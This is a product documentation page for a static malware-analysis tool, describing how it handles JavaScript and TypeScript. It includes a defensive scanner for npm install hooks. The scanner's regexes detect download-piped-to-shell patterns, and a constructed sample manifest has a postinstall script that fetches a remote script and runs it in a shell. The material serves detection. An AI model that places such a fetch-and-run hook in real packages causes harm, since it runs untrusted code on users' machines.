JavaScript & TypeScript — Supported formats
JavaScript and TypeScript are first-class in Decoder. Upload single files, ZIPs, or import a GitHub repo.
What it is
Static + malware analysis for the JS/TS ecosystem.
Why it's useful
Most supply-chain attacks ship through npm — pattern detection plus manifest parsing matters.
How Decoder implements it
Language-aware rules, package.json parsing, postinstall hook detection, entropy + obfuscation signals.
When to use it
Any JS/TS project review, especially fresh npm dependencies.
When NOT to use it
Runtime taint tracking — Decoder is static.
Practical example
A postinstall script with curl|sh trips supply-chain alarms.
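The check described above can be sketched as follows. This is an added example, not Decoder's own code: the hook list, rule names and regexes are illustrative assumptions, and it goes beyond postinstall to cover npm's preinstall and install hooks as well.

```javascript
// Added example: flag npm install-time lifecycle scripts that fetch and run code.
// Hook list, rule ids and regexes are assumptions, not Decoder's actual rules.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

const RULES = [
  // Download piped straight into a shell, e.g. "curl ... | sh".
  { id: 'pipe-to-shell', re: /\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/i },
  // Decoded blob piped into a shell.
  { id: 'base64-to-shell', re: /base64\s+(-d|--decode)\b[^|]*\|\s*(ba|z|da)?sh\b/i },
  // Inline JavaScript passed on the command line instead of a reviewable file.
  { id: 'node-inline-eval', re: /\bnode\s+(-e|--eval)\b/i },
];

// Parse package.json text and return one finding per (hook, rule) match.
function scanManifest(manifestText) {
  let manifest;
  try {
    manifest = JSON.parse(manifestText);
  } catch (err) {
    // A manifest that does not parse cannot be cleared; report it.
    return [{ hook: null, rule: 'invalid-json', command: err.message }];
  }
  // Tolerate a missing or null "scripts" field.
  const scripts = (manifest && typeof manifest.scripts === 'object' && manifest.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    for (const { id, re } of RULES) {
      if (re.test(command)) findings.push({ hook, rule: id, command });
    }
  }
  return findings;
}

// Constructed sample manifests (not taken from any real package).
const SAMPLE_SUSPICIOUS = JSON.stringify({
  name: 'constructed-pkg', version: '1.0.0',
  scripts: { test: 'jest', postinstall: 'curl -fsSL https://example.invalid/setup.sh | sh' },
});
const SAMPLE_BENIGN = JSON.stringify({
  name: 'constructed-lib', version: '2.3.1',
  scripts: { build: 'tsc', postinstall: 'node scripts/build.js' },
});

console.log(scanManifest(SAMPLE_SUSPICIOUS)); // one pipe-to-shell finding on postinstall
console.log(scanManifest(SAMPLE_BENIGN));     // []
```

Pattern matching on the manifest only covers commands written inline in the hook; a hook that calls a script file needs that file reviewed too.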
Glossary
- Postinstall: npm lifecycle script that runs after install — common attack vector.
Related
Static malware analysis inspects code and binaries without executing them. Decoder runs it locally on your upload and surfaces suspicious patterns, entropy spikes and known indicators — no API key required.
A leaked key is the most common breach vector. Decoder combines provider-specific regex (AWS, GitHub, Stripe…) with entropy to flag secrets that don't belong in code.
Most code in any modern project isn't yours. Decoder reads manifests and lockfiles to map the dependency surface and flag suspicious entries.
Obfuscation hides intent. Decoder flags suspicious entropy, base64 walls, eval chains, and packing markers so reviewers can focus on what's actually hidden.